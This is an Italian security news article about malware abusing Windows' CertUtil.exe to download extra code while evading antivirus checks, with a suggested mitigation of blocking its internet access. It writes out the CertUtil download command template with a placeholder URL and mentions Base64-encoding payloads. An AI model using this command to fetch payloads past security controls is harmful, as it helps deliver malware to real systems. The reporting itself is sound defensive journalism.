Aggiornamenti recenti Luglio 10th, 2025 2:02 PM
Apr 05, 2018 Marco Schiaffino Malware, News, RSS, Vulnerabilità 1
Non si tratta di una vulnerabilità nel senso stretto del termine, ma secondo molti ricercatori CertUtil.exe rappresenta uno strumento che i pirati informatici sfruttano regolarmente per scaricare codice malevolo sui computer infetti.
Il programma, integrato in Windows, ha la funzione di consentire il download di certificati digitali e memorizzarli sul computer sotto forma di file in qualsiasi formato.
Come viene spiegato da Lawrence Abrams su Bleeping Computer, che in questo articolo riporta alcuni contributi riguardanti il tema, la tecnica non consente di compromettere il PC ma viene utilizzata in una fase successiva, quando i pirati hanno già accesso alla macchina.
L’uso di un programma integrato in Windows permette infatti ai cyber-criminali di aggirare eventuali controlli dei software antivirus che potrebbero bloccare la connessione a Internet di applicazioni sconosciute, per esempio attraverso sistemi di white list.
Per avviare il download è sufficiente usare un semplice comando del tipo certutil.exe -urlcache -split -f [URL] output.file che non viene bloccato o controllato in alcun modo.
La tecnica sarebbe utilizzata fin dal 2016, con alcune varianti. Una di queste prevede la codifica in Base64 del malware scaricato, che consentirebbe di “ingannare” eventuali programmi antivirus che dovessero analizzare il contenuto dei file scaricati.
Insomma: il trucchetto permette a qualsiasi malware di scaricare e installare moduli aggiuntivi aggirando i sistemi di controllo con estrema facilità.
Sembra però che nessuno, nonostante la questione sia conosciuta, abbia mai sollevato il problema con Microsoft o, addirittura, abbia considerato questa caratteristica di CertUtil.exe come una vera e propria vulnerabilità. La soluzione? Bloccare la possibilità di connessione a Internet di CertUtil.exe.
Giu 25, 2025 0
Giu 11, 2025 0
Giu 03, 2025 0
Mag 30, 2025 0
Lug 10, 2025 0
Lug 09, 2025 0
Lug 08, 2025 0
Lug 07, 2025 0
Lug 08, 2025 0
In una recente analisi, Group-IB ha approfondito il ruolo...Lug 03, 2025 0
Recentemente il team Satori Threat Intelligence di HUMAN ha...Giu 09, 2025 0
La cybersecurity sta acquisendo sempre più importanza tra...Mag 30, 2025 0
Nel 2024, le piccole e medie imprese, spesso considerate il...Mag 27, 2025 0
MATLAB ha smesso di funzionare per quasi una settimana e...Gen 29, 2025 0
Con l’avvento dell’IA generativa...Ott 09, 2024 0
Negli ultimi anni sempre più aziende stanno sottoscrivendo...Ott 02, 2024 0
Grazie al machine learning, il Global Research and Analysis...Set 30, 2024 0
Il 2024 è l’anno delle nuove normative di sicurezza:...Mag 21, 2024 0
Una delle sfide principali delle aziende distribuite sul...Lug 10, 2025 0
Un nuovo gruppo APT entra nei radar dei ricercatori di...Lug 09, 2025 0
Un gruppo di cybercriminali ha rubato circa 140 milioni...Lug 08, 2025 0
In una recente analisi, Group-IB ha approfondito il ruolo...Lug 07, 2025 0
Da giovedì scorso Ingram Micro sta soffrendo per via di...Lug 07, 2025 0
Nella settimana appena trascorsa, il CERT-AGID ha...
One thought on “La funzione CertUtil.exe di Windows viene usata dai malware”